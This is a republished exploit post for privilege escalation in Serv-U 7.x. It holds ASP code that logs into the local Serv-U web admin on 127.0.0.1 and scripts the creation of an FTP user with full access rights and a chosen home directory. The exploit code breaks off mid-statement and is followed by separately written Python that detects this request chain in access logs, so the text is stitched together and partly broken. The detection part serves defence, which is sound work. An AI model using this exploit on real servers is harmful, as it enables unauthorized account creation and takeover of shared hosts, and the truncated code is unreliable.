Elevation of Privilege in Serv-U 7.x (ASP version)

Source: Internet
Author: User

Tools

The idea follows the post by Empty Prodigal Heart (http://www.inbreak.net/?action=show&id=134). Because ASP does not support socket operations, all you can do is create a new domain and then delete it. The program interface is copied from Lu Da's Serv-U 6.x echo program, heh. Because I could not work out how the userid changes in Serv-U 7.0, I only deleted the domain ......
The reason Serv-U 7.4 could not be connected to has been found: in versions after 7.0, a newly added domain is delayed for a period of time before it starts, so the original exp can be used normally. For convenience I added one statement and am offering it again.
 

EXP:

<style type="text/css">
<!--
body, td, th {
font-size: 12px;
}
-->
</style>
<%
' Send one HTTP request to the local Serv-U web interface via XMLHTTP and return the body as a string.
' neirong = request body, fangshi = HTTP method, dizhi = URL, refer = Referer header, cookie = Cookie header
Function httpopen(neirong, fangshi, dizhi, refer, cookie)
Set Http = Server.CreateObject("Microsoft.XMLHTTP")
Http.open fangshi, dizhi, False
Http.setRequestHeader "Referer", refer
Http.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
Http.setRequestHeader "Content-Length", Len(neirong)
Http.setRequestHeader "User-Agent", "Serv-U"
Http.setRequestHeader "x-user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie <> "" Then
Http.setRequestHeader "Cookie", cookie
End If
Http.send neirong
httpopen = bytes2BSTR(Http.responseBody)
Set Http = Nothing
End Function

' Return the substring of str that lies between the first L and the first R.
Function getmidstr(L, R, str)
int_left = InStr(str, L)
int_right = InStr(str, R)
If int_left > 0 And int_right > 0 Then
getmidstr = Mid(str, int_left + Len(L), int_right - int_left - Len(L))
Else
getmidstr = "The executed string does not contain """ & L & """ or """ & R & """"
End If
End Function

' Convert a binary response body to a string (bytes >= 0x80 are treated as double-byte characters).
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, i, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, i + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
'---------- custom parameters start -----------

action = Request("action")
loginpass = Request.Form("loginpass")
port = Request("port")
mydomain = Request.Form("mydomain")
path = Request.Form("path")
ftpport = Request.Form("ftpport")
user = Request.Form("user")
pass = Request.Form("pass")
cmd = Request.Form("cmd")
sessionid = Request("sessionid")
OrganizationId = Request("OrganizationId")
userid = Request("userid")
domainid = Request("domainid")

'---------- custom parameters end -----------

Select Case action

Case 1
' Log in to the local web admin interface and pick the session id out of the XML reply
returns = httpopen("user=&pword=" & loginpass & "&language=zh%2CCN%26", "POST", "http://127.0.0.1:" & port & "/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543", "http://127.0.0.1:" & port & "/?Session=39893&Language=zh,CN&LocalAdmin=1", "")
sessionid = getmidstr("<sessionid>", "</sessionid>", returns)
If sessionid <> "" Then
Response.Write "login OK!" & "</br>"
Response.Redirect "?action=2&sessionid=" & sessionid & "&port=" & port
Else
Response.Write "error!" & "</br>"
End If

Case 2
Call main2()

Case 3
' Read the organization id from the user list page
returns = httpopen("", "POST", "http://127.0.0.1:" & port & "/Admin/ServerUsers.htm?Page=1", "", sessionid)
OrganizationIdTemp = Mid(returns, InStr(returns, "OrganizationUsers.xml&ID="), Len("OrganizationUsers.xml&ID=") + 15)
OrganizationId = Mid(OrganizationIdTemp, InStr(OrganizationIdTemp, "=") + 1, InStr(OrganizationIdTemp, """") - InStr(OrganizationIdTemp, "=") - 1)
If OrganizationId <> "" Then
Response.Write "get OrganizationId " & OrganizationId & " OK!" & "</br>"
Response.Redirect "?action=4&sessionid=" & sessionid & "&port=" & port & "&OrganizationId=" & OrganizationId
Else
Response.Write "error!" & "</br>"
End If
Case 4
Call main3()
Case 5
' Create a new user object and pick its id out of the XML reply
returns = httpopen("", "POST", "http://127.0.0.1:" & port & "/Admin/XML/User.xml?Command=AddObject&Object=COrganization." & OrganizationId & ".User&Temp=1&Sync=546666666666666663", "http://127.0.0.1:" & port & "/Admin/ServerUsers.htm?Page=1", sessionid)
userid = getmidstr("<var name=""ObjectID"" val=""", """/>", returns)
If userid <> "" Then
Response.Write "get userid " & userid & " OK!" & "</br>"
Response.Redirect "?action=6&sessionid=" & sessionid & "&port=" & port & "&OrganizationId=" & OrganizationId & "&userid=" & userid
Else
Response.Write "error!"
End If

Case 6
Call main4()

Case 7
' Fill in the new user's login name, password and home directory
returns = httpopen("LoginID=" & user & "&FullName=&Password=" & pass & "&ComboPasswordType=%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81&PasswordType=0&ComboAdminType=%E6%97%A0%E6%9D%83%E9%99%90&AdminType=&ComboHomeDir=%2F" & path & "&HomeDir=%2F" & path & "&ComboType=%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7&Type=0&ExpiresOn=0&ComboWebClientStartupMode=%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF&WebClientStartupMode=&LockInHomeDir=0&Enabled=1&AlwaysAllowLogin=1&Description=&ExpandRespCodesInMsgFiles=&ComboSignOnMessageFilePath=&SignOnMessageFilePath=&SignOnMessage=&SignOnMessageText=&ComboLimitType=%E8%BF%9E%E6%8E%A5&LimitType=Connection&QuotaBytes=0&Quota=0&Access=7999&MaxSize=0&Dir=%25HOME%25", "POST", "http://127.0.0.1:" & port & "/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization." & OrganizationId & ".User." & userid & "&Sync=1227071190250", "http://127.0.0.1:" & port & "/Admin/ServerUsers.htm?Page=1", sessionid)
Response.Write "add user OK!" & "</br>"
Response.Redirect "?action=8&userid=" & userid & "&port=" & port & "&sessionid=" & sessionid & "&OrganizationId=" & OrganizationId

Case 8
Call main5()

Case 9
' Grant the new user directory access on path
returns = httpopen("Access=7999&MaxSize=0&Dir=%2F" & path & "&undefined=undefined", "POST", "http://127.0.0.1:" & port & "/Admin/XML/Result.xml?Command=AddObject&Object=CUser." & userid & ".DirAccess&Sync=1227081437828", "http://127.0.0.1:" & port & "/Admin/ServerUsers.htm?Page=1", sessionid)
Response.Write "add user power OK!" & "</br>"
Response.Redirect "?action=10&userid=" & userid & "&port=" & port & "&sessionid=" & sessionid & "&OrganizationId=" & Organizati
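From the defender's side, the request chain above (login with LocalAdmin=1, AddObject on COrganization.N.User, UpdateObject on the new user, AddObject on CUser.N.DirAccess, all from 127.0.0.1 with the hardcoded User-Agent "Serv-U") leaves a distinctive trace in the web admin access log. The following Python is an added example, not code from the original post: it parses constructed sample log lines in an assumed CLF-like layout (the function names, the log layout and the sample lines are mine; adapt LINE_RE to the real Serv-U or IIS log format) and flags any client that completes all four steps within a short window.

```python
import re
from datetime import datetime

# Constructed sample access log in an assumed CLF-like layout; lines 1-4 mirror the exploit's request chain.
SAMPLE_LOG = """\
127.0.0.1 - - [22/Nov/2008:10:00:01 +0800] "POST /Web%20Client/Login.xml?Command=Login&Sync=1543543543543543 HTTP/1.1" 200 "Serv-U"
127.0.0.1 - - [22/Nov/2008:10:00:03 +0800] "POST /Admin/XML/User.xml?Command=AddObject&Object=COrganization.7.User&Temp=1 HTTP/1.1" 200 "Serv-U"
127.0.0.1 - - [22/Nov/2008:10:00:04 +0800] "POST /Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.7.User.13 HTTP/1.1" 200 "Serv-U"
127.0.0.1 - - [22/Nov/2008:10:00:05 +0800] "POST /Admin/XML/Result.xml?Command=AddObject&Object=CUser.13.DirAccess HTTP/1.1" 200 "Serv-U"
10.0.0.5 - - [22/Nov/2008:10:30:00 +0800] "POST /Admin/XML/User.xml?Command=AddObject&Object=COrganization.7.User&Temp=1 HTTP/1.1" 200 "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" \d{3} "(?P<ua>[^"]*)"$')

# The four admin-API steps the exploit chains, in order, matched on the request path.
STAGES = [
    ("login",      re.compile(r"/Web%20Client/Login\.xml\?Command=Login", re.I)),
    ("add_user",   re.compile(r"/Admin/XML/User\.xml\?Command=AddObject&Object=COrganization\.\d+\.User", re.I)),
    ("set_user",   re.compile(r"/Admin/XML/Result\.xml\?Command=UpdateObject&Object=COrganization\.\d+\.User\.\d+", re.I)),
    ("dir_access", re.compile(r"/Admin/XML/Result\.xml\?Command=AddObject&Object=CUser\.\d+\.DirAccess", re.I)),
]

def parse_line(line):
    """Parse one line into (ip, time, path, user_agent), or None if it does not match the assumed layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["path"], m["ua"])

def stage_of(path):
    return next((name for name, rx in STAGES if rx.search(path)), None)

def find_account_creation_chains(log_text, window_seconds=300):
    """Return one dict per client that completes login -> add user -> configure user -> grant dir access."""
    per_client = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and stage_of(rec[2]):
            per_client.setdefault(rec[0], []).append((rec[1], stage_of(rec[2]), rec[3]))
    alerts = []
    for ip, hits in per_client.items():
        hits.sort()
        seen = [name for name, _ in STAGES if any(h[1] == name for h in hits)]
        span = (hits[-1][0] - hits[0][0]).total_seconds()
        if len(seen) == len(STAGES) and span <= window_seconds:
            hints = ["loopback source" if ip.startswith("127.") else "remote source"]
            if any(h[2] == "Serv-U" for h in hits):  # the exploit hardcodes this User-Agent
                hints.append("User-Agent 'Serv-U'")
            alerts.append({"ip": ip, "stages": seen, "seconds": span, "hints": hints})
    return alerts
```

A single AddObject from a remote browser (the last sample line) is normal administration and is not flagged; the full chain from loopback in a few seconds is what warrants a look.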
